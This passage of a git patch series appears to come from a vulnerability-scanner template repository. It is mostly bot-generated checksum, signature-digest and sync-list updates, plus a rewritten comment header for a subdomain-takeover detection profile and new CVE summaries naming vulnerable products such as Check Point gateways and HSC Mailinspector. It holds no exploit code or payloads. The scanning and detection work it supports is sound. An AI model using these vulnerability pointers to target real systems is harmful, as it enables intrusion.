http/misconfiguration/installer/blesta-installer.yaml:686fc1c3b634d6ab95ad99034ec7dcb360e7ecba http/misconfiguration/installer/businesso-installer.yaml:7e15b8f657b06411a8c1746dfae68bbb09a3dd62 -http/misconfiguration/installer/call-com-installer.yaml:4d270a0817e615dc4d4584e614c6c50abb40ba89 +http/misconfiguration/installer/call-com-installer.yaml:571138a3c3d7ac78ff952718a9751da42ff05faf http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c88360075ed6dca0c7d4be http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 @@ -5475,7 +5476,7 @@ http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958 http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71 http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a -http/misconfiguration/installer/mura-cms-setup-installer.yaml:401479001b7098dfdd05509b12b0937fcb3de681 +http/misconfiguration/installer/mura-cms-setup-installer.yaml:fd70fc43a4eb276a7b3453e7b10c0a576c381ee2 http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 @@ -5494,7 +5495,7 @@ http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0c http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 -http/misconfiguration/installer/pandora-fms-installer.yaml:78f905cee7803a1ef39ef1a23190a35a2bf8fcf0 +http/misconfiguration/installer/pandora-fms-installer.yaml:d9c01ab04b2a5b72a06702a6f26768d5fd6b829a http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac03565db2994d603c8537 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 @@ -5548,7 +5549,7 @@ http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d http/misconfiguration/installer/wiki-js-installer.yaml:21c556bd08a12c651f419ccc23b69d2980c55a1c http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 -http/misconfiguration/installer/wowonder-installer.yaml:b4ed4185d602e7c9aea4dcc2622d1e140caa5611 +http/misconfiguration/installer/wowonder-installer.yaml:74af794a0e03a1bf19514d1d6817c2a43fe4ea6a http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 @@ -8607,7 +8608,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f899afa37656c02d582deae360e340f004c2784d +templates-checksum.txt:eb95e252e41fe29c34a9560995a9af0f0aa37d01 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ecc638461b82a0f5a63eefbefe065dfe1dbc73e6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:29:50 +0000 Subject: [PATCH 1579/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2621b0c394..3e468cfa82 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-24919.yaml' + - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' From 225364d4a2f2d7292dfceb82f661124029726481 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:30:49 +0000 Subject: [PATCH 1580/1768] Auto Template Signing [Thu May 30 13:30:49 UTC 2024] :robot: --- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2024/CVE-2024-34470.yaml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 178b6cad21..1f9d7e12c6 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200cdb22c1e900a0bffa916eead65b983954ac251a9cf37416e6a859bea4bfba74022056442b9d14d2fdaee049ad30401ec38f4ec53804185bf6b6b15df8df7f6914d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 5fdc791a55..9004991282 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9d214d95910b9ab36686cebb68a0c698a36dcd4f494d1ba91e3d9c36a77cc66022100b58afe9567fddc352d339dfa985e55105c2184de7b06d0a2a756ba07e34d1979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index 84eaac19f9..f61ad1d0e7 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -51,3 +51,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b5aab6fe35d6181963300dc1caea35fb8dd70f83613f032e088a5ddb1a199f3602206474aa1192edf553bb5ac6a3e5d30c743a8c1357ba6b0deb2585b3bcb44f4ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc1a50fec34ed4eef4416071e7e6c206fc57556b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 15:58:36 +0000 Subject: [PATCH 1582/1768] Auto Template Signing [Thu May 30 15:58:36 UTC 2024] :robot: --- http/exposed-panels/oracle-business-control.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index a9d286a7a3..4c75837dae 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402204c37db3664c3092a02d62e172d048d01d2ed6681c6ec1edc3ead1ded8e249a9a022042046755baf85576ddb93246b0bfdbe859eecdd41baf1926bb4c6d8b1d13b721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ec0f074ef5ecc782f581aaa2d446aca634e23f67 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 31 May 2024 01:06:53 +0530 Subject: [PATCH 1583/1768] Update subdomain-takeovers.yml --- profiles/subdomain-takeovers.yml | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/profiles/subdomain-takeovers.yml b/profiles/subdomain-takeovers.yml index 5591c8551b..a70812bc23 100644 --- a/profiles/subdomain-takeovers.yml +++ b/profiles/subdomain-takeovers.yml @@ -1,9 +1,21 @@ -# This is a configuration file for the subdomain takeover template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Subdomain Takeover Detection +# +# This configuration file is specifically tailored for detecting subdomain takeovers using Nuclei. +# +# Purpose: +# This profile is focused on identifying subdomain takeover vulnerabilities across different cloud service providers. +# Subdomain takeovers can occur when a DNS entry points to a deprovisioned or unclaimed cloud resource, potentially +# allowing an attacker to claim the resource and hijack the subdomain. +# +# Included Templates: +# This configuration references specific templates designed to detect subdomain takeover scenarios: +# - http/takeovers/: This directory contains general templates for detecting HTTP-based subdomain takeovers. +# - dns/azure-takeover-detection.yaml: This template specifically checks for subdomain takeovers on Microsoft Azure. +# - dns/elasticbeanstalk-takeover.yaml: This template specifically checks for subdomain takeovers on AWS Elastic Beanstalk. +# +# Running this profile +# You can run this profile using the following command : +# nuclei -profile subdomain-takeovers -u https://www.example.com templates: - http/takeovers/ From bbeeddffbc3f67cdae1bce299410b256267a0f30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 05:15:18 +0000 Subject: [PATCH 1585/1768] Auto Generated Templates Checksum [Fri May 31 05:15:18 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index af30bcac10..24618f3b47 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29484.yaml:f78e59f184d5c43ff7966a2b6fba00554446b9d1 http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 -http/cves/2021/CVE-2021-29625.yaml:6b71626492d0e4d058f7c62d229a939065b84bad +http/cves/2021/CVE-2021-29625.yaml:2316f6210b7a01141b776e42c609483a01c95895 http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c @@ -2504,7 +2504,7 @@ http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb -http/cves/2022/CVE-2022-1595.yaml:c64eac9bb84bf79b3d25cf6f2dacb4fce225c9f7 +http/cves/2022/CVE-2022-1595.yaml:e7b5ba17f21fcc3246fde369ab9c7b82b5f44934 http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d @@ -3047,7 +3047,7 @@ http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 -http/cves/2023/CVE-2023-3345.yaml:f463a1c7cdd257be67891de77bb6ac818625db98 +http/cves/2023/CVE-2023-3345.yaml:a80c20db1df0f1413c0f14c1d90a40138b305dec http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 http/cves/2023/CVE-2023-33584.yaml:b4310ef83324d4f6e1e0d74751be0f3a82f927a3 @@ -3309,7 +3309,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c -http/cves/2024/CVE-2024-34470.yaml:b59fc0e9bbeff6177b5d37ddad097eebdc0e0ae4 +http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -4194,7 +4194,7 @@ http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 -http/exposed-panels/oracle-business-control.yaml:1a40c6d9b1046d965a1e9fecd649423329de4de4 +http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 @@ -8577,7 +8577,7 @@ profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 -profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2 +profiles/subdomain-takeovers.yml:71a2e501c22e3032df9efa362c8062716b725831 profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 @@ -8608,7 +8608,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb95e252e41fe29c34a9560995a9af0f0aa37d01 +templates-checksum.txt:3be6ec98b6cd55d97b0e04c5176921d608a03034 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e4dfff8c616e3218f25c7c2de604e90124a07e0a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 05:16:24 +0000 Subject: [PATCH 1586/1768] Auto Generated cves.json [Fri May 31 05:16:24 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 7fea183947..efb544a3c7 100644 --- a/cves.json +++ b/cves.json @@ -2381,6 +2381,7 @@ {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} +{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} @@ -2412,6 +2413,7 @@ {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index fdd7707641..f700702c1e 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -55d726c9b235a4147824c1f516d6ede1 +452c7c1312faac212368ec04f7467cdf From a0dc2071de2936e63f0828865b69e34cf4a5f5c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 05:17:02 +0000 Subject: [PATCH 1587/1768] Auto Template Signing [Fri May 31 05:17:02 UTC 2024] :robot: --- http/cves/2022/CVE-2022-1595.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index ffc021a8e6..0ab0a80386 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -42,3 +42,4 @@ http: - "contains(header, 'wordpress_')" - "contains(header, 'Location')" condition: and +# digest: 490a0046304402204d27883fc498f5aa445d32855be69c081c8564e779ac28ab176d3a965879dbe3022054938b2fb1c14552e52c1e0b247e097fc18a802f48e48ac7cfcc7b05af268aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 35ed440dd60ee85363b8b12ce6504493c0f38529 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 06:26:12 +0000 Subject: [PATCH 1588/1768] Auto Generated New Template Addition List [Fri May 31 06:26:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a35c11841a..814ab10113 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/misconfiguration/installer/wowonder-installer.yaml +http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 2ae5427765bc94a77cc579132e1d822d19d922e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 06:26:19 +0000 Subject: [PATCH 1589/1768] Auto Generated Templates Checksum [Fri May 31 06:26:19 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 24618f3b47..f406b243d4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:6eee1186277f72ac4416ed2435f40e2541bea763 -cves.json-checksum.txt:3eb64dc359a3fa01d30c701a2ad27aea9bb3b8bc +cves.json:dd91b67f940e974898b092d7ec70b30823618862 +cves.json-checksum.txt:228ead1221696fbf9e065eae8380c2f221438495 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -2504,7 +2504,7 @@ http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb -http/cves/2022/CVE-2022-1595.yaml:e7b5ba17f21fcc3246fde369ab9c7b82b5f44934 +http/cves/2022/CVE-2022-1595.yaml:e62d387c391349d9a30991379aff1b17d5af912d http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d @@ -6784,6 +6784,7 @@ http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 +http/technologies/gabia-server-detect.yaml:b3f9672dec2b27086d25ec314cfa48d4e6f031b0 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 http/technologies/getsimple-cms-detect.yaml:aa37fcd2cac2e03df123bddcf0cf441500318c41 @@ -8608,7 +8609,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3be6ec98b6cd55d97b0e04c5176921d608a03034 +templates-checksum.txt:3c6cc3a0faf81fef12e954fa33a42c3c2ef54b42 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 67ec019aeef7d8f8d55e12d9fd1a82bd01933bdd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 06:26:57 +0000 Subject: [PATCH 1590/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3e468cfa82..2adbb5ff36 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -50,6 +50,7 @@ on: - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 